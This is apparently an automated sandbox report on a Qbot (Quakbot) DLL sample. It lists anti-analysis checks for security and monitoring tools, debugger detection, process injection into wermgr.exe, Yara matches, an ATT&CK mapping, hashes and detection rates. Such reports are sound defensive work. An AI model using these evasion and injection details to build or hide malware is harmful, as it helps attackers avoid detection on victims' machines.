Source: wermgr.exe, 00000009.00000003.334497253.0000000004A1F000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.343820989.0000000004A1F000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.332696186.0000000004A1F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: TCPDUMP.EXE
Source: wermgr.exe, 00000009.00000003.334497253.0000000004A1F000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.343820989.0000000004A1F000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.332696186.0000000004A1F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PROC_ANALYZER.EXE
Source: wermgr.exe, 00000009.00000003.343820989.0000000004A1F000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.332824884.0000000004C0F000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.334728000.0000000004C16000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.334566045.0000000004C0F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WINDUMP.EXE
Source: wermgr.exe, 00000009.00000003.343820989.0000000004A1F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: TCPDUMP.EXE2"
Source: wermgr.exe, 00000009.00000003.334497253.0000000004A1F000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.343820989.0000000004A1F000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.332696186.0000000004A1F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SYSANALYZER.EXE
Source: wermgr.exe, 00000009.00000003.334497253.0000000004A1F000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.343820989.0000000004A1F000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.332696186.0000000004A1F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: DUMPCAP.EXE
Source: wermgr.exe, 00000009.00000003.334497253.0000000004A1F000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.343820989.0000000004A1F000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.332696186.0000000004A1F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WIRESHARK.EXE
Source: wermgr.exe, 00000009.00000003.334497253.0000000004A1F000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.343820989.0000000004A1F000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.332696186.0000000004A1F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: FILEMON.EXE

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5812	Thread sleep count: 134 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1072	Thread sleep count: 110 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\wermgr.exe TID: 4616	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\wermgr.exe TID: 64	Thread sleep count: 41 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\wermgr.exe TID: 5892	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\wermgr.exe TID: 5908	Thread sleep time: -134000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_3-13687

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\SysWOW64\regsvr32.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_3-11545

Source: C:\Windows\System32\loaddll32.exe

API coverage: 6.6 %

Source: C:\Windows\SysWOW64\regsvr32.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_02BCDDE7 GetSystemInfo,

3_2_02BCDDE7

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DA694B5 FindFirstFileExW,		0_2_6DA694B5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_02BCC123 FindFirstFileW,FindNextFileW,		3_2_02BCC123

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6DA59EC6 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6DA59EC6

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_02BCEF38 LoadLibraryA,GetProcAddress,

3_2_02BCEF38

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6DA6A32E GetProcessHeap,

0_2_6DA6A32E

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DA61610 mov ecx, dword ptr fs:[00000030h]		0_2_6DA61610
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DA69229 mov eax, dword ptr fs:[00000030h]		0_2_6DA69229

Source: C:\Windows\System32\loaddll32.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DA59EC6 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6DA59EC6
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DA5A11D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6DA5A11D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DA5D8C3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6DA5D8C3

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wermgr.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wermgr.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wermgr.exe protection: execute and read and write	Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\SysWOW64\wermgr.exe base: 2550000	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\SysWOW64\wermgr.exe base: 2C3C50	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\SysWOW64\wermgr.exe base: 25B0000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\SysWOW64\wermgr.exe base: 2C3C50	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\SysWOW64\wermgr.exe base: 2BF0000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\SysWOW64\wermgr.exe base: 2C3C50	Jump to behavior

Allocates memory in foreign processes

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: C:\Windows\SysWOW64\wermgr.exe base: 2550000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: C:\Windows\SysWOW64\wermgr.exe base: 25B0000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: C:\Windows\SysWOW64\wermgr.exe base: 2BF0000 protect: page read and write	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\wermgr.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\wermgr.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_6DA6BFAE
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_6DA6C73D
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6DA6C614
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6DA6C1A9
Source: C:\Windows\System32\loaddll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_6DA6C912
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6DA66812
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6DA6C843
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_6DA6C3C1
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6DA6C336
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6DA66349
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6DA6C29B
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6DA6C250

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6DA59CE5 cpuid

0_2_6DA59CE5

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6DA59FEC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6DA59FEC

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_02BCDFC2 GetCurrentProcessId,GetLastError,GetSystemMetrics,GetVersionExA,GetWindowsDirectoryW,

3_2_02BCDFC2

Source: regsvr32.exe, 00000003.00000003.322977551.000000000483F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.323275511.0000000004D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.323560680.0000000004C1F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bdagent.exe
Source: regsvr32.exe, 00000003.00000003.322977551.000000000483F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.323275511.0000000004D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.323560680.0000000004C1F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vsserv.exe
Source: regsvr32.exe, 00000003.00000003.322977551.000000000483F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.323275511.0000000004D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.323560680.0000000004C1F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: regsvr32.exe, 00000003.00000003.322977551.000000000483F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.323275511.0000000004D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.323560680.0000000004C1F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avgcsrvx.exe
Source: regsvr32.exe, 00000003.00000003.322977551.000000000483F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.323275511.0000000004D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.323560680.0000000004C1F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: mcshield.exe
Source: regsvr32.exe, 00000003.00000003.322977551.000000000483F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.323275511.0000000004D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.323560680.0000000004C1F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Qbot

Source: Yara match	File source: 4.2.rundll32.exe.4af0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.regsvr32.exe.2b70000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.wermgr.exe.2bc0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.wermgr.exe.2580000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.wermgr.exe.2520000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.3000000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.wermgr.exe.2bc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.wermgr.exe.2580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.wermgr.exe.2520000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.4960000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.wermgr.exe.2580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.wermgr.exe.2520000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4ad0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.2bc0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.wermgr.exe.2520000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.3000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4af0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.4960000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.regsvr32.exe.2b70000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.2bc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.wermgr.exe.2580000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4ad0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000000.329030667.0000000002520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.323262277.0000000003000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.322963828.0000000004960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.322721841.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.331498854.0000000002520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.330442684.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.329591797.0000000002BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.330333126.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.332320278.0000000002580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.329252836.0000000002580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Qbot

Source: Yara match	File source: 4.2.rundll32.exe.4af0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.regsvr32.exe.2b70000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.wermgr.exe.2bc0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.wermgr.exe.2580000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.wermgr.exe.2520000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.3000000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.wermgr.exe.2bc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.wermgr.exe.2580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.wermgr.exe.2520000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.4960000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.wermgr.exe.2580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.wermgr.exe.2520000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4ad0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.2bc0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.wermgr.exe.2520000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.3000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4af0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.4960000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.regsvr32.exe.2b70000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.2bc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.wermgr.exe.2580000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4ad0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000000.329030667.0000000002520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.323262277.0000000003000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.322963828.0000000004960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.322721841.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.331498854.0000000002520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.330442684.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.329591797.0000000002BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.330333126.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.332320278.0000000002580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.329252836.0000000002580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	3 Native API	1 DLL Side-Loading	311 Process Injection	1 Masquerading	1 Credential API Hooking	1 System Time Discovery	Remote Services	1 Screen Capture	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	2 Virtualization/Sandbox Evasion	LSASS Memory	14 Security Software Discovery	Remote Desktop Protocol	1 Credential API Hooking	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	311 Process Injection	Security Account Manager	2 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Archive Collected Data	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Deobfuscate/Decode Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Regsvr32	Cached Domain Credentials	35 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Rundll32	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
diatomaceous.dat.dll	73%	ReversingLabs	Win32.Backdoor.Quakbot
diatomaceous.dat.dll	77%	Virustotal		Browse
diatomaceous.dat.dll	44%	Metadefender		Browse
diatomaceous.dat.dll	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\Desktop\diatomaceous.dat.dll	4%	ReversingLabs
C:\Users\user\Desktop\diatomaceous.dat.dll	3%	Virustotal	Browse
C:\Users\user\Desktop\diatomaceous.dat.dll	NaN%	Metadefender	Browse

Unpacked PE Files

Source	Detection	Scanner	Label	Download
5.2.rundll32.exe.4ad0000.1.unpack	100%	Avira	HEUR/AGEN.1234562	Download File
9.0.wermgr.exe.2bc0000.0.unpack	100%	Avira	HEUR/AGEN.1234562	Download File
7.2.wermgr.exe.2520000.0.unpack	100%	Avira	HEUR/AGEN.1234562	Download File
7.0.wermgr.exe.2520000.0.unpack	100%	Avira	HEUR/AGEN.1234562	Download File
4.2.rundll32.exe.4af0000.1.unpack	100%	Avira	HEUR/AGEN.1234562	Download File
8.0.wermgr.exe.2580000.0.unpack	100%	Avira	HEUR/AGEN.1234562	Download File
8.2.wermgr.exe.2580000.0.unpack	100%	Avira	HEUR/AGEN.1234562	Download File
3.2.regsvr32.exe.2bc0000.0.unpack	100%	Avira	HEUR/AGEN.1234562	Download File

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

⊘No contacted domains info

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	719511
Start date and time:	2022-10-10 16:51:05 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	diatomaceous.dat.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal96.troj.evad.winDLL@18/1@0/0
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 71.7% (good quality ratio 66.5%) Quality average: 75% Quality standard deviation: 29.9%
HCA Information:	Successful, ratio: 99% Number of executed functions: 27 Number of non-executed functions: 67
Cookbook Comments:	Found application associated with file extension: .dll Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.

Simulations

Behavior and APIs

Time	Type	Description
16:52:17	API Interceptor	9x Sleep call for process: wermgr.exe modified

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\Desktop\diatomaceous.dat.dll

Download File

Process:	C:\Windows\SysWOW64\wermgr.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.5939701639198445
Encrypted:	false
SSDEEP:	48:LtIesYew8vL36I8LgS72DsOA1dyqQrD1tXPFJhsppwAOY5iRYgZX0dB1mkK52wRa:aesqt2Dk1dyqIF9JhsLwAOhf2ZW2wIPD
MD5:	C79A1334A3C60DACEE5E43B715236A17
SHA1:	825F4CA853E99E10B81ABE84A1EB2CB6CFD3E8E7
SHA-256:	F892742F6C64A8991337FADDF84FBDB25C43022AC85C8BCC30D47FEBAFEA1D87
SHA-512:	D0B15BAAD608A3EF3AC13E881B9CCA7C27A56CC735AA7324C7AA677274C9FE73FA9B438FDC1B7B2C2B8717EC8949B0ECA605DF58A504F0A705576DC0BA7AF61D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4% Antivirus: Virustotal, Detection: 3%, Browse Antivirus: Metadefender, Detection: NaN%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........B.[.,.[.,.[.,../.V.,..)..,..(.M.,...(.T.,.../.H.,...)...,..-.^.,.[.-.=.,..%.\.,..,.Z.,....Z.,.[...Z.,....Z.,.Rich[.,.................PE..L...n07c...........!....."..........n........@...............................@............@.............................l...l...<....`....................... ......................................p...@............@..\............................text...\!.......".................. ..`.rdata..<....@.......&..............@..@.data....,...0... ..................@....rsrc........`.......(..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Entropy (8bit):	6.8621600107462
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	diatomaceous.dat.dll
File size:	393216
MD5:	2e7f90e0c595d88d28f9fd979ccfcf33
SHA1:	8ff540ba601429c2ee0a444b0d2ec2650d178d23
SHA256:	e3a2c056c730666fedabfed5e3cc2dee12d9c3ca36ac2d7c5289cfe29c125050
SHA512:	0ab199c211e7fe09b332c21da969d26ecccbd2947853c9a7793083e51c59b3aa6a765a0e1d2511c61672c49a60057a5bb05bf29eea33c074b95af55cb9e9a03f
SSDEEP:	6144:8WlZhgoMdtBYTNSlWBsAOrbd62IYQ8jjHH62uzdMPF699o9:Vl3goMdrb5J6wQ8faVn99o
TLSH:	AA846A0379D9BCB6C579123027379BE0C72DEC250BA0C9EF67D8196A4A3C2837525BE5
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........B.[.,.[.,.[.,.../.V.,...)...,...(.M.,...(.T.,.../.H.,...)...,...-.^.,.[.-.=.,...%.\.,...,.Z.,.....Z.,.[...Z.,.....Z.,.Rich[.,

File Icon


Icon Hash:	64da98ecd2ceead4

Static PE Info

General

Entrypoint:	0x10009b6e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x6337306E [Fri Sep 30 18:07:42 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	5258e65ea568c264cf3e536d81339bf5

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007FF004C6C227h
call 00007FF004C6C6E2h
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007FF004C6C0D3h
add esp, 0Ch
pop ebp
retn 000Ch
cmp ecx, dword ptr [10033014h]
